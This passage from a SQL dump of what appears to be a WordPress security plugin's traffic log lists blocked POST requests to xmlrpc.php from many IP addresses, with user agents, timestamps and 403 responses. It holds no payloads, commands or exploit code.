Safari\\/537.36\"}','nm3DOv2FIoaRc5XHYzQTsWg4',0,1681563346.8807,3557,'','POST',403,0,515,0,1,'',0),('3.29.10.88',52234840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','aG5eXWwn6ELb9uOJBT1gpSRq',0,1681566252.5637,1314,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','at6k5GRHie2hpwj1nINrWdPT',0,1681566260.6293,589,'','POST',403,0,515,0,1,'',0),('185.26.156.176',3105529008,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','MRtbfxzu0OqHoCWBJXVkK1Zm',0,1681566266.8881,640,'','POST',403,0,515,0,1,'',0),('219.94.129.200',3680403912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','uIeM4mLjcGyOd5DAqwXpgW36',0,1681566272.9399,575,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','n9oU4CHYG7rP2IuFs0xVbOl3',0,1681567145.4805,3429,'','POST',403,0,515,0,1,'',0),('198.38.91.22',3324402454,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jQegaMfYHGb5834KmdiRZsyw',0,1681567145.6465,3264,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','nWUxp8YBEiFrgGa5vqZmVJ42',0,1681567157.0291,630,'','POST',403,0,515,0,1,'',0),('5.23.51.23',85406487,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','6un1tb2fOcpGSRTdLBva9mPK',0,1681567159.9754,632,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','a1CTSZiJtMsqf90do8jcORkL',0,1681567163.9622,1156,'','POST',403,0,515,0,1,'',0),('193.200.99.82',3251135314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','NI5Ab1WrGB2UPointzEXqRF4',0,1681567167.1962,615,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','qbp2uO81rQ9PYzi7nAdLSZXW',0,1681567170.1167,604,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','P0xMsU1824ZKknFEbiegcCjH',0,1681567173.8698,776,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','2gZz58sRjeOq9WPynES3IVTB',0,1681567177.5065,1170,'','POST',403,0,515,0,1,'',0),('37.187.1.231',633012711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','O3B7KCnqSsRdNjiMAoQY1DZ2',0,1681567181.3231,657,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','wEXsTd3bxHIyC5h6tfDz49Le',0,1681567182.1011,647,'','POST',403,0,515,0,1,'',0),('157.7.188.161',2634529953,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','XOHbvR3oVKwz7MT01gWsnFZl',0,1681569057.0727,2882,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','7RTpb0r4ixWYVKZfwABHoaCc',0,1681569057.3010,3369,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','IGzVyR2m5jCKET4gpsSrnlBd',0,1681569067.4956,567,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','s5Mn4v8VjcDqUpJIHCtWQ91O',0,1681569069.3973,574,'','POST',403,0,515,0,1,'',0),('101.0.73.122',1694517626,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','XVr8LpBN0nOeSa6xFfRuJHM4',0,1681569076.0510,553,'','POST',403,0,515,0,1,'',0),('195.154.107.17',3281677073,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','hw1WreqzKvY89IdSkVn7MpNc',0,1681569078.8608,562,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','6UKW2u4Z9oPxsGkvEIri5OCb',0,1681569079.7301,550,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','tA8HvBiNxQzbgmMU1CPd6IKS',0,1681569098.6726,574,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','uWjUb8fSpY2t0VGkcM5PrzeH',0,1681569113.4847,1300,'','POST',403,0,515,0,1,'',0),('116.202.235.13',1959455501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','iNK3vnkDe4VFCJWrpAb9qfah',0,1681569113.8600,1136,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','iwjsKCeZAmDP6fFIztxo9ylE',0,1681569119.9958,595,'','POST',403,0,515,0,1,'',0),('79.142.69.160',1334724000,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','yolAW8fSOL0dHcpFC97YxzXj',0,1681570744.1723,1572,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','1ApHT6OWIjVKztmaeYMiCPJE',0,1681571692.3148,1672,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','bAqDwvUOi3hMILg4SGoa7rFk',0,1681571690.5426,4118,'','POST',403,0,515,0,1,'',0),('43.204.104.245',734816501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','u46X2i5KMzdeP1LpUqfnsT7F',0,1681571703.5841,986,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bT6xapRy913APcWGtnJfZmhv',0,1681571709.5976,574,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','YCz1jJaEpDGNFyAoWm0kOfLB',0,1681571735.0392,580,'','POST',403,0,515,0,1,'',0),('162.0.229.50',2717967666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','yD3saYBZt8r2QESecfRFTW96',0,1681571738.4852,1302,'','POST',403,0,515,0,1,'',0),('198.54.120.17',3325458449,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','TjkwR9LFXIAsuoYf17vg80tB',0,1681571738.5479,1353,'','POST',403,0,515,0,1,'',0),('204.93.196.26',3428697114,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','zs1EwYDKxRWa4cUIvtOGJnro',0,1681571742.4434,588,'','POST',403,0,515,0,1,'',0),('103.82.27.150',1733434262,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','SWGrYV3wQAK9DBhE1TZj5MRk',0,1681571749.4292,612,'','POST',403,0,515,0,1,'',0),('178.162.212.214',2997015766,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oLaicdH3M9wAFrt5gNV6mbhf',0,1681572728.9343,756,'','POST',403,0,515,0,1,'',0),('85.10.156.97',1426758753,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','J9FjmwARz2vGah7Y3BSTEcxr',0,1681575370.5405,3606,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','7yikXr1cjwGKWs6vSCVHU8f2',0,1681575377.4886,882,'','POST',403,0,515,0,1,'',0),('173.231.220.123',2917653627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','yNxDTS51LGKEP03lFZpkgv4m',0,1681575378.1617,747,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','FTwDy0XWgBsZr5NhC64Rbzld',0,1681575385.4146,558,'','POST',403,0,515,0,1,'',0),('167.86.123.58',2807462714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','G0JUcK5dNHfL3RSWh1kixIs4',0,1681575393.0779,861,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','AX1aIyrD9k2ndPc86GVMhbOg',0,1681575393.6787,799,'','POST',403,0,515,0,1,'',0),('88.214.28.5',1490426885,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eoUfAPz0u3LiXVGKY1cJ9vpt',0,1681575394.7842,575,'','POST',403,0,515,0,1,'',0),('194.195.112.30',3267588126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','4FYD8ncCVGTPLKRwuao306ev',0,1681575414.1031,605,'','POST',403,0,515,0,1,'',0),('101.0.73.122',1694517626,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4QLKcazoPVtCnf5ehj2NJTuk',0,1681575423.9017,551,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','k0tzrWIT5hRONEZpnAjFcL4K',0,1681575427.2781,1801,'','POST',403,0,515,0,1,'',0),('184.75.223.235',3091980267,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qmZR9F3Tg1jh2zSCOQr6GLHV',0,1681575960.7930,4159,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','14HbKwzfZahO75grt9mEiGFB',0,1681575999.4872,617,'','POST',403,0,515,0,1,'',0),('213.160.184.22',3584079894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','eVDvAB6Xpa81ydx97JO4iG2R',0,1681576001.9388,582,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','0DUSolIWO21CNRwYijmcnqfs',0,1681576011.2519,566,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','7yBAKFMi3OpltbEoTkqYnvr0',0,1681576022.0620,1412,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','yWzntJASKj4uBqZTMoN06iO1',0,1681576022.1873,1365,'','POST',403,0,515,0,1,'',0),('189.203.144.160',3184234656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','yDKT4Vsx1XWUeJ7IlYHbQGwa',0,1681576026.1895,568,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','gbIM9WadZvRf0jqAXUTmBLCk',0,1681576029.0473,606,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rBRbzVGjEk3fv1KSpXCAd9eo',0,1681576038.0150,1234,'','POST',403,0,515,0,1,'',0),('196.189.44.24',3300731928,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','4YlwXJTGV5su8v9fUkdL2bIF',0,1681576038.2808,1177,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','mpf8ZOMKiD5bdn7ocwThLF0W',0,1681576051.2708,572,'','POST',403,0,515,0,1,'',0),('104.247.108.18',1761045522,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','ApVib5uOeU4rTnaG1lW3vP7E',0,1681578813.1924,3692,'','POST',403,0,515,0,1,'',0),('124.158.10.139',2090732171,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','NSK8Qxr9l4CtMzhF23yIvGpa',0,1681578815.2742,1610,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','vH3gJUwL4IZ2kqP09m6foTB8',0,1681578818.9170,1952,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','lIvLr1NyZKzxc0QmoSM5HeJh',0,1681578823.4347,564,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','fTIREVCe20PjSNxrwoD6nhvK',0,1681578841.2650,753,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','8MZlmkeNPFKCwjIW35OSLhQb',0,1681578842.7802,712,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','N06BVufAiOZWq4M3gDrLtY2e',0,1681578847.6566,588,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','SoCj8eRb4YELw0hlTprq3HGf',0,1681578851.9241,617,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','SnJ5FKAVp3vP9z7gYX8IukUR',0,1681578855.4913,404,'','POST',404,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','I0fV4WiHOFjk37hTxu2qrKAZ',0,1681578860.2106,550,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','nF5Zt1R48pfcb6yxHNQVPKI2',0,1681578868.8040,590,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KwSoH6OUQyd5TpDg8qvuXFrx',0,1681580165.9405,3889,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','HN3aoTkZCe1Szfqi0B8x2FJK',0,1681580694.3903,2152,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','fqdX4yjI2BDroZC09EWF6vlu',0,1681580694.9431,1821,'','POST',403,0,515,0,1,'',0),('193.200.99.82',3251135314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','G6d7jMr3z5F4siSUE8CYDwq1',0,1681580700.9941,1799,'','POST',403,0,515,0,1,'',0),('185.141.215.15',3113080591,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ku0IbiCKzGMt73sxWTHrph94',0,1681580701.9680,1508,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','Ru9ZE5IjeUQqaDiTWBmLf8kp',0,1681580710.7954,632,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','Eiop7r93ehAgvOQP65XBtSad',0,1681580713.1051,555,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','IvdGLpl5KXxaUn7m3FyszNZE',0,1681580720.8801,553,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','hFPnR3HrxKlgaLXez6J7T24W',0,1681580729.5963,559,'','POST',403,0,515,0,1,'',0),('51.79.204.217',860867801,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','smTRMxA5WrdPQelkSZ8I4u7q',0,1681580740.1285,567,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','edtXabvVlqgSiAcWurkQfjsR',0,1681580743.3316,545,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','8wnG7UJRI1dPrpByWjMNel9a',0,1681581629.7017,1557,'','POST',403,0,515,0,1,'',0),('184.154.83.114',3097121650,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','3IqgK4CwxUiRhHPFNn7WVByG',0,1681581631.8131,553,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile 